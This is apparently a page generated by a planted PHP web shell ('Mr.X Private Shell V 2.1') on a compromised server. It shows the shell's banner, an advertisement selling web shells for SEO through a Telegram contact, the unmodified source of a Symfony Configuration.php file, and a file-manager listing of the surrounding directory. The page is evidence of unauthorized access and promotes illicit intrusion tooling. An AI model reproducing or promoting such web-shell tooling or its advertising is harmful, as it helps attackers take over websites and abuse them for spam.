__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config\Definition; use Symfony\Component\Config\Definition\Builder\TreeBuilder; use Symfony\Component\Config\Definition\Configurator\DefinitionConfigurator; use Symfony\Component\Config\Definition\Loader\DefinitionFileLoader; use Symfony\Component\Config\FileLocator; use Symfony\Component\DependencyInjection\ContainerBuilder; /** * @author Yonel Ceruto <[email protected]> * * @final */ class Configuration implements ConfigurationInterface { public function __construct( private ConfigurableInterface $subject, private ?ContainerBuilder $container, private string $alias, ) { } public function getConfigTreeBuilder(): TreeBuilder { $treeBuilder = new TreeBuilder($this->alias); $file = (new \ReflectionObject($this->subject))->getFileName(); $loader = new DefinitionFileLoader($treeBuilder, new FileLocator(\dirname($file)), $this->container); $configurator = new DefinitionConfigurator($treeBuilder, $loader, $file, $file); $this->subject->configure($configurator); return $treeBuilder; } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Builder | Folder | 0755 |
|
|
| Configurator | Folder | 0755 |
|
|
| Dumper | Folder | 0755 |
|
|
| Exception | Folder | 0755 |
|
|
| Loader | Folder | 0755 |
|
|
| ArrayNode.php | File | 11.68 KB | 0644 |
|
| BaseNode.php | File | 14.82 KB | 0644 |
|
| BooleanNode.php | File | 1.19 KB | 0644 |
|
| ConfigurableInterface.php | File | 594 B | 0644 |
|
| Configuration.php | File | 1.34 KB | 0644 |
|
| ConfigurationInterface.php | File | 613 B | 0644 |
|
| EnumNode.php | File | 2.7 KB | 0644 |
|
| FloatNode.php | File | 1.19 KB | 0644 |
|
| IntegerNode.php | File | 1.06 KB | 0644 |
|
| NodeInterface.php | File | 2.02 KB | 0644 |
|
| NumericNode.php | File | 1.76 KB | 0644 |
|
| Processor.php | File | 2.47 KB | 0644 |
|
| PrototypeNodeInterface.php | File | 610 B | 0644 |
|
| PrototypedArrayNode.php | File | 11.08 KB | 0644 |
|
| ScalarNode.php | File | 1.59 KB | 0644 |
|
| VariableNode.php | File | 3.36 KB | 0644 |
|